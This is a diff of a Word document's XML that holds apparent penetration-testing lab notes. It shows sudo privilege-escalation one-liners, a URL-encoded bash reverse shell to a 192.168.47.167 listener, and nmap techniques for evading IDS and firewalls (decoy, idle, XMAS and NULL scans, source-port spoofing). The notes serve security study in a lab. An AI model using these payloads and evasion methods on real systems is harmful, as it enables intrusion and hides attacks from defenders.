+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> User </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3801,14 +4235,26 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">#     </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>(root) NOPASSWD: /</w:t>
+        <w:t xml:space="preserve">#  </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>root) NOPASSWD: /</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3835,14 +4281,26 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">#     </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>(root) NOPASSWD: /</w:t>
+        <w:t xml:space="preserve">#  </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>root) NOPASSWD: /</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3917,123 +4375,141 @@
     <w:p/>
     <w:p>
       <w:r>
+        <w:t># If you can run find:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> find / -exec /bin/bash \;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t># If you can run python3:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> python3 -c 'import </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>os</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>os.system</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>("/bin/bash")'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t># If you can run find:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> find / -exec /bin/bash \;</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t># If you can run python3:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> python3 -c 'import </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>os</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>os.system</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>("/bin/bash")'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
         <w:t>192.168.46.117/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -4052,14 +4528,6 @@
         </w:rPr>
         <w:t>=</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4287,6 +4755,3527 @@
           <w:bCs/>
         </w:rPr>
         <w:t>bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.47.167%2F9090%200%3E%261%27</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Advanced NMAP Scans:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">We are going to bypass this rule </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">alert </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> any </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>any</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -&gt; $HOME_NET 21 (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>flags:SAR</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>;...</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>XMAS Scan (-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sX</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>````````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Sends a TCP packet with the FIN, PSH, and URG flags set. </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t># From Attacker-Kali (192.168.56.10)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sX</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -p 20-25 192.168.56.20</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Source Port Manipulation (-g):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``````````````````````````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>To use a common source port (like port 53 for DNS or port 80 for HTTP) to bypass stateless firewalls that trust traffic originating from these ports.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Some simple firewalls are configured to allow any traffic coming from a specific port, assuming it's part of a legitimate, established connection (e.g., a DNS reply). The -g (or --source-port) flag in Nmap lets you specify the source port for your scan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>example:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -g 53 192.168.56.20</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Wireshark Analysis: Run a Wireshark capture on your Kali interface (eth0 or similar) during the second scan. Apply the filter </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>tcp.port</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> == 53. You should see that your scan packets are originating from port 53 on your machine.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>NULL Scan (-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sN</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>```````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Sends a TCP packet with no flags set. RFC 793 standard states that if a port is closed, it should respond with an RST packet. If it's open, it should ignore the packet.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t># From Attacker-Kali (192.168.56.10)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sN</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -p 20-25 192.168.56.20</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Decoy Scanning (-D):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>`````````````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>To make it difficult for the target's intrusion detection system (IDS) to determine the true source IP address of a scan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The -D (or --decoy) flag allows you to specify one or more IP addresses to be used as "decoys." Nmap will send packets from these decoy IPs as well as your own. To the target, the scan appears to be coming from multiple sources simultaneously. Your real IP is randomly placed among the decoys by default.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>example:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Perform a scan using the Zombie and FTP server as decoys. The ME keyword tells Nmap where to place your real IP. RND:10 adds 10 random IPs.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t># From Attacker-Kali (192.168.56.10)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -D 192.168.56.30,192.168.56.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>40,x</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>.x.x.x 192.168.56.20</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>OR</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -D </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ME,RND</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:10 192.168.56.20</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>OR</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -D RND:10 192.168.56.101</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Idle/Zombie Scan (-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sI</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>): PASSIVE SCAN:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>`````````````````````````````````````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Use a "zombie" host to scan indirectly, making it appear as if the zombie is scanning the target (your IP is hidden).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t># From Attacker-Kali (192.168.56.10)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"># Command: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sI</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>zombie_ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt; &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>target_ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sI</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.56.30 192.168.56.20</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Overt vs. Covert Methodologies:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``````````````````````````````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>[+] Overt Scanning: Prioritizes speed and information gathering. This approach is loud, easily detected by Intrusion Detection Systems (IDS), and is typically used when you have explicit permission and want to map a network quickly (e.g., during an authorized internal penetration test).</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>1) Enable service/version detection (-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>), OS detection (-O), and default script scanning (-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sC</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) to get a complete picture in one go.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>2) Coverage: Scan all 65,535 TCP ports (-p 0-65535) to ensure nothing is missed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t># From Attacker-Kali (192.168.56.10)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -p0-65535 -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -O -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sC</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
